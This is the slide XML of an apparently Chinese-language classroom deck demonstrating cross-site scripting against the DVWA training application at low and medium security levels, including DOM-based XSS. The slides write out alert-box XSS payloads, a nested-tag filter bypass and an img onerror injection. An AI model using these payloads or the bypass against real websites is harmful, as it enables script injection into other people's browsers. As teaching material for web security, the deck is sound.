          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37087666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a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="224997" y="1619819"/>
            <a:ext cx="8390241" cy="4896311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1134159"/>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solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="477857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txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1134159"/>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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DEMO::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="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1165219" y="1656705"/>
            <a:ext cx="7453471" cy="4529912"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="向右箭號 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="477794" y="5338118"/>
            <a:ext cx="840259" cy="7661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在此</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1375719" y="5436973"/>
            <a:ext cx="3516235" cy="6672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95114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726846"/>
            <a:ext cx="7886700" cy="3423544"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1134159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="5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br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2138063" y="3756457"/>
            <a:ext cx="2408537" cy="40914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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4770919" y="4165601"/>
            <a:ext cx="2802562"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dirty="0"/>
              <a:t>&lt;script&gt;alert(/xss/)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1852940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p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1134159"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>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br>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2700" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2700" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1383" r="6952"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="154306" y="2185607"/>
            <a:ext cx="8835387" cy="3630993"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3456428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3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="54187"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="1601250"/>
            <a:ext cx="3613150" cy="3352288"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="圖片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="7244"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3127375" y="1350937"/>
            <a:ext cx="6016625" cy="4133850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1858663" y="3277394"/>
            <a:ext cx="592437" cy="342106"/>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p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3127375" y="5133322"/>
            <a:ext cx="3425825" cy="23877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6" name="圖片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="39167" t="41085" r="32500" b="3194"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="209550" y="4953000"/>
            <a:ext cx="2590800" cy="1905000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3230008" y="5576530"/>
            <a:ext cx="3903184"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dirty="0"/>
              <a:t>&lt;sc&lt;script&gt;ript&gt;alert(/xsstest/)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="矩形 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3127375" y="6107779"/>
            <a:ext cx="5626100" cy="646331"/>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dirty="0"/>
              <a:t>從程式碼發現無法再透過message參數注入XSS攻擊碼</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>但name參數依舊存在XSS攻擊</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="315632"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent6">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DVWA_1.10_Medium</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rPr>
              <a:t>::</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="157827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487681"/>
            <a:ext cx="9144000" cy="793706"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS==Cross Site Scripting </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1443442" y="1825625"/>
            <a:ext cx="7071907" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="圖片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953250" y="577965"/>
            <a:ext cx="1694361" cy="650361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="內容版面配置區 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="61365" y="1409419"/>
            <a:ext cx="1382078" cy="1193075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12829042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extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="29166" t="14603" r="35000" b="5481"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="127000" y="1536700"/>
            <a:ext cx="3276600" cy="2781300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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01962" y="1433383"/>
            <a:ext cx="6010275" cy="4086225"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3001962" y="5114526"/>
            <a:ext cx="3043238" cy="40508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1469081" y="2963336"/>
            <a:ext cx="486719" cy="28786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p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="59373" t="55401" r="7067" b="380"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="91281" y="5114526"/>
            <a:ext cx="2819401" cy="1663700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3458608" y="5773200"/>
            <a:ext cx="3623043"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TW" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>=alert('xsstest2')&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="標題 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="398078"/>
            <a:ext cx="9144000" cy="1035305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="002060"/>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r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>不</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>::</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3006125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a:t>DOM Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0" smtClean="0"/>
              <a:t>exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6600" dirty="0" smtClean="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0"/>
              <a:t>實務</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="5400" dirty="0" smtClean="0"/>
              <a:t>測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="5400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>參考資料</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>://www.hackingarticles.in/understanding-dom-based-xss-dvwa-bypass-security/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF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83285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1246648" y="2290816"/>
            <a:ext cx="7045674" cy="4250028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358345" y="1659348"/>
            <a:ext cx="8060725" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" smtClean="0"/>
              <a:t>http://192.168.1.250/DVWA/vulnerabilities/xss_d/?default=English</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8"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a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>正常</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
